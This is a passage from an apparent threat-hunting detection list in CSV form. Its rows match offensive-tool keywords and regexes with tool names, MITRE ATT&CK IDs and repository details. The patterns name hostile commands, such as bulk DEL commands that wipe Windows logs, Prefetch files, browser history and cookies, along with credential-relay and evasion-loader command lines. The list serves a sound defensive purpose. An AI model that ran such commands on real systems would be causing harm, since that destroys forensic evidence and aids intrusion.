deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*DEL /q /f %appdata%\Google\Chrome\""User Data""\Default\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%appdata\%\\Google\\Chrome\\\""User\sData\""\\Default\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %appdata%\Google\Chrome\""User Data""\Default\History\*.*",".{0,1000}DEL\s\/q\s\/f\s\%appdata\%\\Google\\Chrome\\\""User\sData\""\\Default\\History\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f 
%appdata%\Microsoft\Windows\Recent\*.*",".{0,1000}DEL\s\/q\s\/f\s\%appdata\%\\Microsoft\\Windows\\Recent\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\*.log*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 
- T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\Prefetch\*.pf*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\Prefetch\\.{0,1000}\.pf.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\system\*.log*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\system\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 
- T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\system32\*.log*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system32\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\system32\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system32\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\Temp\*.inf*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\Temp\\.{0,1000}\.inf.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\Temp\*.lnk*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\Temp\\.{0,1000}\.lnk.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f /s %appdata%\Microsoft\Windows\Cookies\*.*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Microsoft\\Windows\\Cookies\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - 
T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f /s %appdata%\Microsoft\Windows\Cookies\*.**",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Microsoft\\Windows\\Cookies\\.{0,1000}\..{0,1000}.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f /s %appdata%\Microsoft\Windows\Recent\*.*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Microsoft\\Windows\\Recent\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f /s %appdata%\Mozilla\Firefox\Profiles\*.*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Mozilla\\Firefox\\Profiles\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f /s %userprofile%\*.log*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%userprofile\%\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f /s %userprofile%\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%userprofile\%\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - 
T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*deleg_enum_imp*",".{0,1000}deleg_enum_imp.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*Delegation/delegation.py*",".{0,1000}Delegation\/delegation\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*delegation_constrained_objects.txt*",".{0,1000}delegation_constrained_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z"
"*delegation_constrained_w_protocol_transition_objects.txt*",".{0,1000}delegation_constrained_w_protocol_transition_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*delegation_rbcd_objects.txt*",".{0,1000}delegation_rbcd_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*delegation_unconstrained_objects.txt*",".{0,1000}delegation_unconstrained_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*DelegationBOF.*",".{0,1000}DelegationBOF\..{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*DELETE FROM LDAPHUNTERFINDINGS*",".{0,1000}DELETE\sFROM\sLDAPHUNTERFINDINGS.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*DeleteKey(*SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\*",".{0,1000}DeleteKey\(.{0,1000}SOFTWARE\\\\Microsoft\\\\Windows\sNT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. 
- BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*DeletePSscriptSignning.bat*",".{0,1000}DeletePSscriptSignning\.bat.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DeleteScheduleTask(LPCSTR computerName*",".{0,1000}DeleteScheduleTask\(LPCSTR\scomputerName.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. 
- BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*deliver.exe -d -c * -f*.enc*",".{0,1000}deliver\.exe\s\-d\s\-c\s.{0,1000}\s\-f.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*deliver.exe -d -f *.enc*",".{0,1000}deliver\.exe\s\-d\s\-f\s.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*dementor - rough PoC to connect to spoolss to elicit machine account authentication *",".{0,1000}dementor\s\-\srough\sPoC\sto\sconnect\sto\sspoolss\sto\selicit\smachine\saccount\sauthentication\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*dementor.py -d * -u * -p *",".{0,1000}dementor\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","rough PoC to connect to spoolss to elicit machine account authentication","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*demo-bof.cna*",".{0,1000}demo\-bof\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*demo-client.exe *",".{0,1000}demo\-client\.exe\s.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*demo-controller.exe *",".{0,1000}demo\-controller\.exe\s.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*demonizedshell.sh*",".{0,1000}demonizedshell\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 
TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*demonizedshell_static.sh*",".{0,1000}demonizedshell_static\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*Dendrobate-master*",".{0,1000}Dendrobate\-master.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*dendron*FileMonInject.dll*",".{0,1000}dendron.{0,1000}FileMonInject\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation 